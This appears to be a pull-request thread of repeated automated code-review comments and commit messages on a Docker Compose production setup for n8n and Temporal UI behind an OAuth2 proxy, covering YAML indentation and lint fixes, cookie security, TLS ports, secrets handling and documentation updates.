14-14: ⚠️ Potential issue

Fix indentation of the volumes entry under n8n.
The mount point is indented 8 spaces but should be 6 spaces under volumes: (4 spaces).
-    volumes:
-        - /home/ubuntu/volumes/certs:/home/node/certs:ro
+    volumes:
+      - /home/ubuntu/volumes/certs:/home/node/certs:ro
🧰 Tools

🪛 YAMLlint (1.35.1)

[warning] 14-14: wrong indentation: expected 6 but found 8

(indentation)

16-71: ⚠️ Potential issue

Correct indentation for the oauth2-proxy service.
All keys under oauth2-proxy: are over-indented by 2 spaces and won't be recognized. Service properties should be indented 4 spaces (not 6). Apply this pattern throughout the block.
 services:
-  oauth2-proxy:
-      container_name: temporal-oauth-proxy
-      image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
-      restart: unless-stopped
-      depends_on:
-        - temporal-ui
-      env_file:
-        - .env
-      ports:
-        - "80:80"
+  oauth2-proxy:
+    container_name: temporal-oauth-proxy
+    image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
+    restart: unless-stopped
+    depends_on:
+      - temporal-ui
+    env_file:
+      - .env
+    ports:
+      - "80:80"
(Replicate this indentation fix for environment, healthcheck, networks, etc.)

🧰 Tools

🪛 YAMLlint (1.35.1)

[warning] 17-17: wrong indentation: expected 4 but found 6

(indentation)

[error] 31-31: trailing spaces

(trailing-spaces)

[error] 34-34: trailing spaces

(trailing-spaces)

[error] 42-42: trailing spaces

(trailing-spaces)

[error] 50-50: trailing spaces

(trailing-spaces)

[error] 57-57: trailing spaces

(trailing-spaces)

[error] 60-60: trailing spaces

(trailing-spaces)

🧹 Nitpick comments (2)

docker-compose.prod.yml (2)

31-31: Remove trailing whitespace.
Several blank or comment lines contain unnecessary trailing spaces, triggering lint errors.

Please trim trailing spaces on lines 31, 34, 42, 50, 57, and 60.

Also applies to: 34-34, 42-42, 50-50, 57-57, 60-60

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 31-31: trailing spaces

(trailing-spaces)

90-90: Ensure newline at end of file.
Add a newline to satisfy POSIX standards and suppress end-of-file lint warnings.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 90-90: no new line character at the end of file

(new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between e9f7ae4 and 2f3f07b.

📒 Files selected for processing (1)

docker-compose.prod.yml (1 hunks)

🧰 Additional context used

🪛 YAMLlint (1.35.1)

docker-compose.prod.yml

[warning] 14-14: wrong indentation: expected 6 but found 8

(indentation)

[warning] 17-17: wrong indentation: expected 4 but found 6

(indentation)

[error] 31-31: trailing spaces

(trailing-spaces)

[error] 34-34: trailing spaces

(trailing-spaces)

[error] 42-42: trailing spaces

(trailing-spaces)

[error] 50-50: trailing spaces

(trailing-spaces)

[error] 57-57: trailing spaces

(trailing-spaces)

[error] 60-60: trailing spaces

(trailing-spaces)

[error] 90-90: no new line character at the end of file

(new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (2)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
GitHub Check: Service Availability Check

🔇 Additional comments (1)

docker-compose.prod.yml (1)

45-45: Verify OAUTH2_PROXY_COOKIE_SECURE setting.
In a production HTTPS environment, OAUTH2_PROXY_COOKIE_SECURE=false will send cookies over plain HTTP. Consider setting it to true to enforce secure-only cookies.

Can you confirm the proxy is always behind TLS and adjust this flag if necessary?

… settings Modified the docker-compose.prod.yml to enable SSL by changing the OAUTH2_PROXY_HTTP_ADDRESS to port 443, added SSL certificate settings, and enforced secure cookie settings for production. Updated healthcheck to use HTTPS.

coderabbitai

Actionable comments posted: 1

♻️ Duplicate comments (2)

docker-compose.prod.yml (2)
1-1: Add top-level version declaration
It's best practice to specify a top-level version field to ensure consistent behavior across Compose versions.
+version: "3.8"
 services:
13-14: ⚠️ Potential issue

Fix indentation of the n8n volume mount
The volume list item is indented 8 spaces but should be 6 spaces under volumes: to form a valid YAML sequence.
-        - /home/ubuntu/volumes/certs:/home/node/certs:ro
+      - /home/ubuntu/volumes/certs:/home/node/certs:ro
🧰 Tools

🪛 YAMLlint (1.35.1)

[warning] 14-14: wrong indentation: expected 6 but found 8

(indentation)

🧹 Nitpick comments (4)

docker-compose.prod.yml (4)
11-11: Quote environment values containing spaces
Unquoted spaces in list-item syntax can lead to parsing ambiguities. Wrap the scopes in quotes for clarity.
-      - N8N_GOOGLE_SCOPES=email profile
+      - N8N_GOOGLE_SCOPES="email profile"
29-31: Use Docker secrets for sensitive credentials
Keeping OAUTH2_PROXY_CLIENT_SECRET and OAUTH2_PROXY_COOKIE_SECRET in plain environment vars can expose them in process listings or logs. Consider leveraging Docker secrets for secure handling:
secrets:
  oauth2_client_secret:
    file: ./secrets/oauth2_client_secret.txt
  oauth2_cookie_secret:
    file: ./secrets/oauth2_cookie_secret.txt

services:
  oauth2-proxy:
    secrets:
      - oauth2_client_secret
      - oauth2_cookie_secret
    environment:
      - OAUTH2_PROXY_CLIENT_SECRET_FILE=/run/secrets/oauth2_client_secret
      - OAUTH2_PROXY_COOKIE_SECRET_FILE=/run/secrets/oauth2_cookie_secret
Also applies to: 41-41

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 31-31: trailing spaces

(trailing-spaces)

31-64: Remove trailing whitespace from blank lines
Blank lines at 31, 34, 42, 50, 57, 61, and 64 contain trailing spaces. Trim these to avoid YAML parsing warnings.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 31-31: trailing spaces

(trailing-spaces)

[error] 34-34: trailing spaces

(trailing-spaces)

[error] 42-42: trailing spaces

(trailing-spaces)

[error] 50-50: trailing spaces

(trailing-spaces)

[error] 57-57: trailing spaces

(trailing-spaces)

[error] 61-61: trailing spaces

(trailing-spaces)

[error] 64-64: trailing spaces

(trailing-spaces)

96-96: Ensure newline at end of file
Add a final newline character to conform with POSIX standards and prevent parser errors.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 96-96: no new line character at the end of file

(new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 2f3f07b and 03ff33d.

📒 Files selected for processing (1)

docker-compose.prod.yml (1 hunks)

🧰 Additional context used

🪛 YAMLlint (1.35.1)

docker-compose.prod.yml

[warning] 14-14: wrong indentation: expected 6 but found 8

(indentation)

[error] 31-31: trailing spaces

(trailing-spaces)

[error] 34-34: trailing spaces

(trailing-spaces)

[error] 42-42: trailing spaces

(trailing-spaces)

[error] 50-50: trailing spaces

(trailing-spaces)

[error] 57-57: trailing spaces

(trailing-spaces)

[error] 61-61: trailing spaces

(trailing-spaces)

[error] 64-64: trailing spaces

(trailing-spaces)

[warning] 68-68: wrong indentation: expected 6 but found 8

(indentation)

[error] 96-96: no new line character at the end of file

(new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (2)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
GitHub Check: Service Availability Check

…ration Modified docker-compose.prod.yml to update the SSL certificate and key paths for both n8n and oauth2-proxy services, ensuring they point to the correct Let's Encrypt certificates. This change enhances the security and functionality of the production environment.

coderabbitai

Actionable comments posted: 0

🧹 Nitpick comments (3)

docker-compose.prod.yml (3)
1-1: Add an explicit Compose version declaration
Including a top-level version field helps ensure consistent behavior across different Docker Compose versions and tooling.
Apply this diff:
+version: "3.8"
 services:
32-65: Remove trailing whitespace on blank lines
YAMLLint flagged trailing spaces on several blank lines within the environment blocks. Please trim these lines to eliminate extraneous spaces, for example:
-      <blank line with spaces>
+      
🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 32-32: trailing spaces

(trailing-spaces)

[error] 35-35: trailing spaces

(trailing-spaces)

[error] 43-43: trailing spaces

(trailing-spaces)

[error] 51-51: trailing spaces

(trailing-spaces)

[error] 58-58: trailing spaces

(trailing-spaces)

[error] 62-62: trailing spaces

(trailing-spaces)

[error] 65-65: trailing spaces

(trailing-spaces)

98-98: Ensure newline at end of file
Add a trailing newline to satisfy POSIX conventions and YAMLLint’s new-line-at-end-of-file rule.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 98-98: no new line character at the end of file

(new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 03ff33d and ce21895.

📒 Files selected for processing (1)

docker-compose.prod.yml (1 hunks)

🧰 Additional context used

🪛 YAMLlint (1.35.1)

docker-compose.prod.yml

[error] 32-32: trailing spaces

(trailing-spaces)

[error] 35-35: trailing spaces

(trailing-spaces)

[error] 43-43: trailing spaces

(trailing-spaces)

[error] 51-51: trailing spaces

(trailing-spaces)

[error] 58-58: trailing spaces

(trailing-spaces)

[error] 62-62: trailing spaces

(trailing-spaces)

[error] 65-65: trailing spaces

(trailing-spaces)

[error] 98-98: no new line character at the end of file

(new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (2)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
GitHub Check: Service Availability Check

🔇 Additional comments (2)

docker-compose.prod.yml (2)

71-75: Verify the healthcheck command availability
The healthcheck uses wget, which may not be present in the quay.io/oauth2-proxy/oauth2-proxy:v7.8.0 image. Ensure wget exists in the container, or consider switching to curl or another tool bundled in the image.

80-87: Confirm usage of declared named volumes
You’ve declared the n8n_data, opensearch-data, and postgresql-data volumes, but the n8n service only mounts SSL certificates. If you intended to persist n8n state, you’ll need to mount n8n_data (e.g., /home/node/.n8n). Otherwise, consider removing unused volume declarations.

Modified docker-compose.prod.yml to change the OAUTH2_PROXY_HTTP_ADDRESS and service port from 443 to 8080, ensuring compatibility with the updated service configuration. This change aligns with the current production environment setup.

coderabbitai

Actionable comments posted: 2

♻️ Duplicate comments (1)

docker-compose.prod.yml (1)
1-2: Add a top-level version field to anchor Compose schema
It's best practice to specify a Compose file version to ensure predictable behavior across environments.

Consider prepending:
version: "3.8"
services:
  ...

🧹 Nitpick comments (2)

docker-compose.prod.yml (2)

28-50: Trim trailing whitespace and excess blank lines in env blocks
There are several blank lines with trailing spaces in the OAuth2 Proxy environment section (e.g., around lines 32, 35, 43, 51). Removing them will eliminate linter warnings and improve readability.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 32-32: trailing spaces

(trailing-spaces)

[error] 35-35: trailing spaces

(trailing-spaces)

[error] 43-43: trailing spaces

(trailing-spaces)

80-98: Remove trailing spaces and add a newline at EOF
YAMLlint flagged trailing spaces (e.g., line 98) and the lack of a newline at the end of the file. Please trim all trailing whitespace and ensure a single newline character terminates the file.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 98-98: no new line character at the end of file

(new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between ce21895 and 96a1df2.

📒 Files selected for processing (1)

docker-compose.prod.yml (1 hunks)

🧰 Additional context used

🪛 YAMLlint (1.35.1)

docker-compose.prod.yml

[error] 32-32: trailing spaces

(trailing-spaces)

[error] 35-35: trailing spaces

(trailing-spaces)

[error] 43-43: trailing spaces

(trailing-spaces)

[error] 51-51: trailing spaces

(trailing-spaces)

[error] 58-58: trailing spaces

(trailing-spaces)

[error] 62-62: trailing spaces

(trailing-spaces)

[error] 65-65: trailing spaces

(trailing-spaces)

[error] 98-98: no new line character at the end of file

(new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (2)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
GitHub Check: Service Availability Check

🔇 Additional comments (2)

docker-compose.prod.yml (2)

17-27: OAuth2 Proxy basic service configuration looks solid
Container name, image, restart policy, dependencies, .env loading, and port mapping are all correctly specified.

59-67: Verify TLS configuration and healthcheck port alignment
You’ve provided OAUTH2_PROXY_SSL_CERT and OAUTH2_PROXY_SSL_KEY for TLS, but the service is bound via OAUTH2_PROXY_HTTP_ADDRESS=0.0.0.0:8080. Confirm whether the proxy is indeed serving HTTPS on port 8080 or if you need to use OAUTH2_PROXY_HTTPS_ADDRESS for port 443. Then update the healthcheck URL accordingly.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 62-62: trailing spaces

(trailing-spaces)

[error] 65-65: trailing spaces

(trailing-spaces)

…ign-out URLs Modified docker-compose.prod.yml to change the OAUTH2_PROXY_REDIRECT_URL and OAUTH2_PROXY_SIGN_OUT_URL to use HTTP and port 8080, ensuring compatibility with the current service setup. This update aligns with the recent changes in the production environment.

…tion configuration Modified docker-compose.prod.yml to adjust the OAUTH2_PROXY_REDIRECT_URL, ensuring it includes the port 8080 for the OAuth2 callback. This change aligns with the current service setup and maintains consistency with recent updates.

coderabbitai

Actionable comments posted: 0

♻️ Duplicate comments (2)

docker-compose.prod.yml (2)
77-79: ⚠️ Potential issue

Define app-network at the root level.

You attach oauth2-proxy to app-network, but there's no top-level networks: declaration, causing Compose to fail.
Add at the bottom:
 volumes:
   …
+networks:
+  app-network:
+    external: true
2-16: 🛠️ Refactor suggestion

Add restart policy and network for n8n service.

The n8n service currently lacks a restart policy for resiliency and isn't attached to the shared app-network, which likely breaks inter-service communication with the OAuth2 proxy.
Consider:
 services:
   n8n:
+  restart: unless-stopped
+  networks:
+    - app-network
     environment:
       - N8N_HOST=n8n.speedandfunction.com
       …

🧹 Nitpick comments (2)

docker-compose.prod.yml (2)
1-1: Specify Docker Compose version.

It's best practice to declare a top-level version field for consistent behavior across environments.
Add this at the top:
+version: "3.8"
 services:
32-65: Remove trailing spaces and ensure EOF newline.

Static analysis reports trailing spaces on lines 32, 35, 43, 51, 58, 62, 65 and a missing newline at EOF. Cleaning these up will improve readability and prevent CI warnings.
-      # Email validation settings␣
+      # Email validation settings
...
-  postgresql-data:␣
+  postgresql-data:
+
Also applies to: 98-98

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 32-32: trailing spaces

(trailing-spaces)

[error] 35-35: trailing spaces

(trailing-spaces)

[error] 43-43: trailing spaces

(trailing-spaces)

[error] 51-51: trailing spaces

(trailing-spaces)

[error] 58-58: trailing spaces

(trailing-spaces)

[error] 62-62: trailing spaces

(trailing-spaces)

[error] 65-65: trailing spaces

(trailing-spaces)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 96a1df2 and f4feec9.

📒 Files selected for processing (1)

docker-compose.prod.yml (1 hunks)

🧰 Additional context used

🪛 YAMLlint (1.35.1)

docker-compose.prod.yml

[error] 32-32: trailing spaces

(trailing-spaces)

[error] 35-35: trailing spaces

(trailing-spaces)

[error] 43-43: trailing spaces

(trailing-spaces)

[error] 51-51: trailing spaces

(trailing-spaces)

[error] 58-58: trailing spaces

(trailing-spaces)

[error] 62-62: trailing spaces

(trailing-spaces)

[error] 65-65: trailing spaces

(trailing-spaces)

[error] 98-98: no new line character at the end of file

(new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (2)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
GitHub Check: Service Availability Check

🔇 Additional comments (1)

docker-compose.prod.yml (1)

41-42: Verify consistency of redirect and sign-out URLs.

The OAUTH2_PROXY_REDIRECT_URL omits the port while the OAUTH2_PROXY_SIGN_OUT_URL includes :8080. This mismatch can lead to callback failures. Ensure both URLs match your external routing. For example:
-      - OAUTH2_PROXY_REDIRECT_URL=${OAUTH2_PROXY_REDIRECT_URL:-http://temporal.speedandfunction.com/oauth2/callback}
+      - OAUTH2_PROXY_REDIRECT_URL=${OAUTH2_PROXY_REDIRECT_URL:-http://temporal.speedandfunction.com:8080/oauth2/callback}

-      - OAUTH2_PROXY_SIGN_OUT_URL=http://temporal.speedandfunction.com:8080/oauth2/sign_out
+      - OAUTH2_PROXY_SIGN_OUT_URL=${OAUTH2_PROXY_SIGN_OUT_URL:-http://temporal.speedandfunction.com:8080/oauth2/sign_out}
Also applies to: 67-67

coderabbitai

Actionable comments posted: 1

♻️ Duplicate comments (1)

docker-compose.prod.yml (1)
72-79: 🛠️ Refactor suggestion

Declare app-network at root level
You attach services to app-network but haven’t defined it. Compose will error out. Add this at the bottom of the file to declare it as an external network:
 volumes:
   postgresql-data:
     driver_opts:
       device: /data/postgresql
+networks:
+  app-network:
+    external: true

🧹 Nitpick comments (7)

docker-compose.prod.yml (7)
1-1: Add Docker Compose version declaration
It’s best practice to specify a top-level version field (e.g. "3.8") to ensure consistent behavior across environments.

Apply this diff at the top:
+version: "3.8"
 services:
2-16: Add resilience and network scoping for n8n
In production, the n8n service should include a restart policy and be attached to the shared app-network to recover from failures and communicate securely with other services.
 services:
   n8n:
+    restart: unless-stopped
+    networks:
+      - app-network
     environment:
       - N8N_HOST=n8n.speedandfunction.com
       ...
24-27: Limit exposed ports if possible
Currently binding 8080:8080 on all interfaces. If the OAuth2 proxy should only be accessible internally, consider binding to 127.0.0.1:8080:8080 or using firewall rules to reduce the attack surface.

64-64: Reduce debug verbosity in prod
OAUTH2_PROXY_SHOW_DEBUG_ON_ERROR=true can leak sensitive info in production logs. Consider disabling it or switching to false for live environments.

68-71: Architectural note on SSL cert mounts
Bind-mounting Let’s Encrypt certs works, but ensure rotation via Certbot hooks won’t disrupt the running container. Alternatively, consider using a Docker-managed volume or secrets mechanism for smoother updates.

32-32: Strip trailing spaces
Several blank/comment lines have trailing spaces which can trigger YAML parsing warnings. Please remove them.

Also applies to: 35-35, 43-43, 51-51, 58-58, 62-62, 65-65

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 32-32: trailing spaces

(trailing-spaces)

98-98: Add newline at end of file
POSIX standards recommend a trailing newline to prevent parser warnings and version control mismatches.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 98-98: no new line character at the end of file

(new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between f4feec9 and 4c73330.

📒 Files selected for processing (1)

docker-compose.prod.yml (1 hunks)

🧰 Additional context used

🪛 YAMLlint (1.35.1)

docker-compose.prod.yml

[error] 32-32: trailing spaces

(trailing-spaces)

[error] 35-35: trailing spaces

(trailing-spaces)

[error] 43-43: trailing spaces

(trailing-spaces)

[error] 51-51: trailing spaces

(trailing-spaces)

[error] 58-58: trailing spaces

(trailing-spaces)

[error] 62-62: trailing spaces

(trailing-spaces)

[error] 65-65: trailing spaces

(trailing-spaces)

[error] 98-98: no new line character at the end of file

(new-line-at-end-of-file)

🔇 Additional comments (2)

docker-compose.prod.yml (2)

17-23: oauth2-proxy basic setup looks solid
The container name, image, restart policy, and depends_on: temporal-ui are correctly configured for production.

37-38: Confirm cookie and whitelist domains
You’re using .temporal.speedandfunction.com—verify this matches your actual domain hierarchy. If you need to cover multiple subdomains, you may want .speedandfunction.com instead.

…m redirect and sign-out URLs Modified docker-compose.prod.yml to remove port 8080 from the OAUTH2_PROXY_REDIRECT_URL and OAUTH2_PROXY_SIGN_OUT_URL, ensuring they align with the current service setup. Updated healthcheck to reflect the change in the service address.

coderabbitai

Actionable comments posted: 2

♻️ Duplicate comments (2)

docker-compose.prod.yml (2)
1-1: Declare a Compose file version
It's best practice to specify a top-level version field (e.g., version: "3.8") to ensure consistent behavior across Docker Compose versions.

77-79: Declare the app-network at the bottom
You attach services to app-network, but there's no root networks: block. Either mark it as external or define it:
 volumes:
   …
 networks:
   app-network:
     external: true

🧹 Nitpick comments (5)

docker-compose.prod.yml (5)
2-15: Add a restart policy and network to the n8n service
To improve resilience, ensure n8n restarts on failure and can communicate over the same user-defined network as other services.

Apply this diff:
 services:
   n8n:
+    restart: unless-stopped
     environment:
       - N8N_HOST=n8n.speedandfunction.com
@@
     volumes:
       - /etc/letsencrypt/live/n8n.speedandfunction.com/fullchain.pem:/home/node/certs/n8n.fullchain.pem:ro
       - /etc/letsencrypt/live/n8n.speedandfunction.com/privkey.pem:/home/node/certs/n8n.privkey.pem:ro
+    networks:
+      - app-network
71-72: Use a more reliable healthcheck command
The oauth2-proxy image may not include wget. Consider using curl or a shell‐based test.
-    healthcheck:
-      test: ["CMD", "wget", "-O", "/dev/null", "-q", "http://localhost/oauth2/health"]
+    healthcheck:
+      test: ["CMD-SHELL", "curl -f http://localhost/oauth2/health || exit 1"]
80-98: Unify volume naming conventions
You mix underscores (n8n_data) and hyphens (opensearch-data, postgresql-data). For consistency and readability, pick one style across all declared volumes.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 98-98: no new line character at the end of file

(new-line-at-end-of-file)

32-65: Remove trailing whitespace on blank lines
Several blank separators under environment: contain spaces that trigger YAML lint errors. Removing the trailing spaces will prevent parsing issues.

Example diff for one occurrence (apply similarly at lines 32,35,43,51,58,62,65):
-      # Email validation settings␣␣␣
+      # Email validation settings
🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 32-32: trailing spaces

(trailing-spaces)

[error] 35-35: trailing spaces

(trailing-spaces)

[error] 43-43: trailing spaces

(trailing-spaces)

[error] 51-51: trailing spaces

(trailing-spaces)

[error] 58-58: trailing spaces

(trailing-spaces)

[error] 62-62: trailing spaces

(trailing-spaces)

[error] 65-65: trailing spaces

(trailing-spaces)

98-98: Add a newline at end-of-file
Ensure the file ends with a single newline character to satisfy POSIX conventions and avoid lint warnings.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 98-98: no new line character at the end of file

(new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 4c73330 and 789753d.

📒 Files selected for processing (1)

docker-compose.prod.yml (1 hunks)

🧰 Additional context used

🪛 YAMLlint (1.35.1)

docker-compose.prod.yml

[error] 32-32: trailing spaces

(trailing-spaces)

[error] 35-35: trailing spaces

(trailing-spaces)

[error] 43-43: trailing spaces

(trailing-spaces)

[error] 51-51: trailing spaces

(trailing-spaces)

[error] 58-58: trailing spaces

(trailing-spaces)

[error] 62-62: trailing spaces

(trailing-spaces)

[error] 65-65: trailing spaces

(trailing-spaces)

[error] 98-98: no new line character at the end of file

(new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (2)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
GitHub Check: Service Availability Check

…iguration Modified docker-compose.prod.yml to set OAUTH2_PROXY_COOKIE_SECURE and OAUTH2_PROXY_CSRF_COOKIE_SECURE to false, adjusting the security settings for cookies in the production environment. This change may be necessary for compatibility with the current service setup.

Updated the OAuth2 Proxy setup guide to clarify the configuration process for Google OAuth in production. Simplified the prerequisites, enhanced the Google OAuth setup instructions, and revised the environment configuration section to reflect the new variable names and structure. Removed outdated Docker Compose setup details for improved clarity.

Expanded the environment configuration section in the OAuth2 Proxy setup guide to include additional settings for cookie and CSRF protection, as well as debug and sign-out options. Updated the note for production and development setups, ensuring clarity on variable usage and domain adjustments.

coderabbitai

Actionable comments posted: 0

🧹 Nitpick comments (4)

docs/oauth2-proxy.md (4)
29-29: Document multiple email domain support
Specify that OAUTH2_PROXY_EMAIL_DOMAINS accepts a comma-separated list (e.g., domain1.com,domain2.com) when you need to restrict access to multiple domains.

29-37: Unify placeholder domain syntax
The guide currently alternates between yourdomain.com and <your-domain>. Standardize to a single placeholder format (for example, <your-domain.com>) throughout to avoid confusion.

58-61: Add a Docker Compose service example
Embedding a full oauth2-proxy service snippet (including env_file and health check) will streamline adoption. For instance:
+### Docker Compose Service Example
+```yaml
+services:
+  oauth2-proxy:
+    image: quay.io/oauth2-proxy/oauth2-proxy:v7.4.0
+    env_file:
+      - .env
+    ports:
+      - "8080:8080"
+    depends_on:
+      - temporal-ui
+    healthcheck:
+      test: ["CMD", "curl", "-f", "http://localhost:8080/oauth2/healthz"]
+      interval: 30s
+      timeout: 10s
+      retries: 3
+```
60-61: Clarify enabling OAuth2 Proxy in development
The note mentions that OAuth2 Proxy isn’t enabled by default in dev. Please include a brief snippet or instructions showing how to add the oauth2-proxy service (with env_file: .env) to a docker-compose.dev.yml or local setup.

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 6b9471d and 1df277d.

📒 Files selected for processing (1)

docs/oauth2-proxy.md (1 hunks)

⏰ Context from checks skipped due to timeout of 90000ms (2)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
GitHub Check: Service Availability Check

…emporal-ui service Modified the healthcheck URL in docker-compose.yml to replace the hardcoded port with a dynamic variable, ensuring it reflects the correct service port defined by TEMPORAL_UI_PORT. This change enhances flexibility and aligns with the current service configuration.

Revised the Docker Compose section in README.md to simplify the production setup instructions. Removed the detailed explanation of using the COMPOSE_FILE environment variable and focused on the -f flag method for clarity. This change enhances the readability and usability of the documentation.

…tup script Updated .env.example to include new environment variables for OAuth2 Proxy and n8n. Modified docker-compose files to utilize these variables, ensuring dynamic port assignments and improved service configurations. Removed the setup_volumes.sh script and streamlined README.md to reflect these changes, enhancing clarity and usability for users.

coderabbitai

Actionable comments posted: 4

🧹 Nitpick comments (8)

.env.example (1)
21-25: Include Sign-Out URL Placeholder & Clarify Domain

.env.example defines OAUTH2_PROXY_REDIRECT_URL but omits OAUTH2_PROXY_SIGN_OUT_URL, which is hard-coded in docker-compose.prod.yml. Consider exposing it so users can override sign-out behavior.

Also, replace the your-domain placeholder with guidance (e.g., temporal.speedandfunction.com) to match your documented production host.

Suggested diff:
 # OAuth2 Proxy / Google OAuth
 GOOGLE_CLIENT_ID=your_google_client_id
 GOOGLE_CLIENT_SECRET=your_google_client_secret
 OAUTH2_PROXY_COOKIE_SECRET=your_random_cookie_secret
-OAUTH2_PROXY_REDIRECT_URL=https://your-domain/oauth2/callback
+OAUTH2_PROXY_REDIRECT_URL=https://your-domain/oauth2/callback
+OAUTH2_PROXY_SIGN_OUT_URL=https://your-domain/oauth2/sign_out
README.md (3)
40-45: Standardize Docker CLI Usage
The development section uses docker compose, but the production command (docker-compose -f …) uses the hyphenated form. To avoid confusion, pick one style—docker compose is recommended for the latest Docker CLI.

49-49: Align Production Command with New CLI
-docker-compose -f docker-compose.yml -f docker-compose.prod.yml up -d
+docker compose -f docker-compose.yml -f docker-compose.prod.yml up -d
63-63: Consider --pull on Rebuild
You’ve consolidated build and up into one command—nice! For production you might add --pull to ensure you fetch the latest base images:
docker compose up --build --pull --force-recreate -d
docker-compose.prod.yml (4)
1-2: Add top-level version declaration
Include a Compose version (e.g., version: "3.8") at the top to lock in behavior across CLI versions.

27-34: Pin OAuth2-Proxy Image to a Digest
Relying on a mutable tag can introduce supply-chain risks. Pin to a SHA256 digest you’ve audited:
-    image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
+    image: quay.io/oauth2-proxy/oauth2-proxy@sha256:<digest>
75-82: Healthcheck & Network Hygiene

Consider using curl instead of wget for the healthcheck to align with common Docker images.

Ensure the app-network definition is applied (see earlier comment).

11-101: Clean Up Trailing Spaces & Add EOF Newline
YAMLLint reports trailing spaces on multiple lines and a missing newline at EOF. Removing these will prevent parsing warnings.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 11-11: trailing spaces

(trailing-spaces)

[error] 42-42: trailing spaces

(trailing-spaces)

[error] 45-45: trailing spaces

(trailing-spaces)

[error] 53-53: trailing spaces

(trailing-spaces)

[error] 61-61: trailing spaces

(trailing-spaces)

[error] 68-68: trailing spaces

(trailing-spaces)

[error] 71-71: trailing spaces

(trailing-spaces)

[error] 101-101: no new line character at the end of file

(new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 8c86686 and 5697b99.

📒 Files selected for processing (5)

.env.example (2 hunks)
README.md (2 hunks)
docker-compose.prod.yml (1 hunks)
docker-compose.yml (5 hunks)
scripts/setup_volumes.sh (0 hunks)

💤 Files with no reviewable changes (1)

scripts/setup_volumes.sh

🚧 Files skipped from review as they are similar to previous changes (1)

docker-compose.yml

🧰 Additional context used

🪛 YAMLlint (1.35.1)

docker-compose.prod.yml

[error] 11-11: trailing spaces

(trailing-spaces)

[error] 42-42: trailing spaces

(trailing-spaces)

[error] 45-45: trailing spaces

(trailing-spaces)

[error] 53-53: trailing spaces

(trailing-spaces)

[error] 61-61: trailing spaces

(trailing-spaces)

[error] 68-68: trailing spaces

(trailing-spaces)

[error] 71-71: trailing spaces

(trailing-spaces)

[error] 101-101: no new line character at the end of file

(new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (1)

GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)

🔇 Additional comments (3)

.env.example (1)

11-11: Confirm N8N_HOST Default Domain
You’ve added N8N_HOST=n8n.speedandfunction.com to match your production DNS. Please verify this aligns with your ingress or external routing (e.g., if you serve n8n under a subpath or alternate hostname, update accordingly).

README.md (1)

38-39: Great clarification on environment modes
Splitting the startup instructions into development vs. production makes the workflow much clearer for new contributors.

docker-compose.prod.yml (1)

43-49: Verify Cookie & Whitelist Domains
You’ve set .temporal.speedandfunction.com. Confirm your DNS doesn’t duplicate subdomains (e.g., temporal.temporal.speedandfunction.com) and that all intended clients match this domain.

🧰 Tools

🪛 YAMLlint (1.35.1)

[error] 45-45: trailing spaces

(trailing-spaces)

…ervice configuration Eliminated the DISABLE_SECURITY_PLUGIN environment variable from the opensearch service in docker-compose.prod.yml, streamlining the configuration and enhancing security practices.

coderabbitai

Actionable comments posted: 3

♻️ Duplicate comments (1)

docker-compose.prod.yml (1)
